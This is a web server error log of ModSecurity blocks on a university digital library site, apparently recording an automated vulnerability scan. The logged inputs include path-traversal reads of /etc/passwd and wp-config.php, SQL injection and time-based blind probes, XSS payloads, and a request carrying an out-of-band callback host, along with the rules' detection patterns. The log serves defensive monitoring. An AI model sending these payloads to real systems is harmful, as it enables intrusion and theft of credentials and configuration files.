[Tue Aug 29 11:36:33.567770 2023] [:error] [pid 1436] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: % found within ARGS:keyword: %61%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%27%27%2b%28%53%45%4c%45%43%54%20%6d%64%35%28%39%39%39%39%39%39%39%29%29%2b%27"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/mobile/plugin/browser.jsp"] [unique_id "ZO110cCo-f0AAAWcCRgAAAAL"]
[Tue Aug 29 11:36:33.592603 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110cCo-f0AAASHiDoAAAAD"]
[Tue Aug 29 11:36:34.408786 2023] [:error] [pid 1451] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:ID: <svg onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO110sCo-f0AAAWrxpUAAAAY"]
[Tue Aug 29 11:36:36.959462 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ACS_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:ACS_path: ../../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/advanced_component_system/index.php"] [unique_id "ZO111MCo-f0AAATQXoUAAAAO"]
[Tue Aug 29 11:36:37.364331 2023] [:error] [pid 1451] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAAWrxqQAAAAY"]
[Tue Aug 29 11:36:37.415726 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///c://windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAAT@K0AAAAA2"]
[Tue Aug 29 11:36:38.361040 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/_s_/dyn/Log_highlight"] [unique_id "ZO111sCo-f0AAAT@K0IAAAA2"]
[Tue Aug 29 11:36:39.483680 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gbu46j36ad5g8f.oast.site found within TX:1: cjmnbitjmimt14dgn26gbu46j36ad5g8f.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO1118Co-f0AAASEJggAAAAE"]
[Tue Aug 29 11:36:41.423614 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO112cCo-f0AAASEJhAAAAAE"]
[Tue Aug 29 11:36:41.476087 2023] [:error] [pid 1461] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></iframe><svg/onload=alert(\\x222UdyWLo0lCLqcBCjs5YehILlcGu\\x22)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/ccm/system/panels/page/preview_as_user/preview"] [unique_id "ZO112cCo-f0AAAW1WaAAAAAD"]
[Tue Aug 29 11:36:42.363445 2023] [:error] [pid 1445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/LetsEncrypt/Index"] [unique_id "ZO112sCo-f0AAAWlCdUAAAAR"]
[Tue Aug 29 11:36:43.376970 2023] [:error] [pid 1461] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:idusuario: '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO1128Co-f0AAAW1WacAAAAD"]
[Tue Aug 29 11:36:44.411742 2023] [:error] [pid 1455] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '' found within ARGS:idusuario: ''"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO113MCo-f0AAAWvFC0AAAAa"]
[Tue Aug 29 11:36:49.472312 2023] [:error] [pid 1423] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pdf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:pdf: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/report/download.php"] [unique_id "ZO114cCo-f0AAAWPpakAAAAH"]
[Tue Aug 29 11:36:56.511148 2023] [:error] [pid 1465] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:filename: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/wpsite-background-takeover/exports/download.php"] [unique_id "ZO116MCo-f0AAAW51XwAAAAF"]
[Tue Aug 29 11:36:57.492967 2023] [:error] [pid 1466] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x22@ found within ARGS:login: \\x22<svg/onload=alert(document.domain)>\\x22@gmail.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO116cCo-f0AAAW6dWwAAAAE"]
[Tue Aug 29 11:37:07.807703 2023] [:error] [pid 1467] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/download.php"] [unique_id "ZO1188Co-f0AAAW7FKoAAAAE"]
[Tue Aug 29 11:37:09.452168 2023] [:error] [pid 1471] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO119cCo-f0AAAW-Qy4AAAAN"]
[Tue Aug 29 11:37:16.387003 2023] [:error] [pid 1469] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 4"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/fuel/pages/items/"] [unique_id "ZO11-MCo-f0AAAW9IWAAAAAI"]
[Tue Aug 29 11:37:16.496884 2023] [:error] [pid 1469] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tf_version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:tf_version: ' and (select pg_sleep(10)) ISNULL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/api/search/attribute"] [unique_id "ZO11-MCo-f0AAAW9IWUAAAAI"]
[Tue Aug 29 11:37:16.603248 2023] [:error] [pid 1437] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11-MCo-f0AAAWdst4AAAAM"]
[Tue Aug 29 11:37:27.427096 2023] [:error] [pid 1461] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union SELECT found within ARGS:appno:  1 union SELECT 98989*443131,1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12B8Co-f0AAAW1WmgAAAAD"]
[Tue Aug 29 11:37:35.392392 2023] [:error] [pid 1397] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:log_filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12D8Co-f0AAAV1ERYAAAAd"]
[Tue Aug 29 11:37:37.391893 2023] [:error] [pid 1397] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php"] [unique_id "ZO12EcCo-f0AAAV1ESMAAAAd"]
[Tue Aug 29 11:37:45.475513 2023] [:error] [pid 1455] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:dbkey:syslog.rlog. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:dbkey:syslog.rlog: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/page/sl_logdl"] [unique_id "ZO12GcCo-f0AAAWvFKgAAAAa"]
[Tue Aug 29 11:37:47.567537 2023] [:error] [pid 1467] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ):\\x0a     found within ARGS:script: from pyspider.libs.base_handler import *\\x0aclass Handler(BaseHandler):\\x0a    def on_start(self):\\x0a        print(str(452345672   567890765))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/debug/pyspidervulntest/run"] [unique_id "ZO12G8Co-f0AAAW7FNkAAAAE"]
[Tue Aug 29 11:37:50.440045 2023] [:error] [pid 1454] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bf_text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:bf_text: \\x22><img src=x onerror=console.log(123);>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO12HsCo-f0AAAWurGYAAAAZ"]
[Tue Aug 29 11:37:52.397694 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:next_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:next_file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/adm/file.cgi"] [unique_id "ZO12IMCo-f0AAAXA9kcAAAAO"]
[Tue Aug 29 11:37:55.077208 2023] [:error] [pid 1455] [client 66.249.70.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22MAHMUD,\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12I8Co-f0AAAWvFOUAAAAa"]
[Tue Aug 29 11:37:59.395947 2023] [:error] [pid 1493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lastname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:lastname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO12J8Co-f0AAAXVynYAAAAB"]
[Tue Aug 29 11:37:59.528484 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:logfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:logfile: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/content-log.php"] [unique_id "ZO12J8Co-f0AAAUFdq0AAAA9"]
[Tue Aug 29 11:38:10.553088 2023] [:error] [pid 1522] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/down_data.php"] [unique_id "ZO12MsCo-f0AAAXyx1cAAAAi"]
[Tue Aug 29 11:38:23.437455 2023] [:error] [pid 1397] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../etc/./zpx/../passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/pacsone/nocache.php"] [unique_id "ZO12P8Co-f0AAAV1EYYAAAAd"]
[Tue Aug 29 11:38:33.377331 2023] [:error] [pid 1509] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/FlagEm/flagit.php"] [unique_id "ZO12ScCo-f0AAAXlRqQAAAAV"]
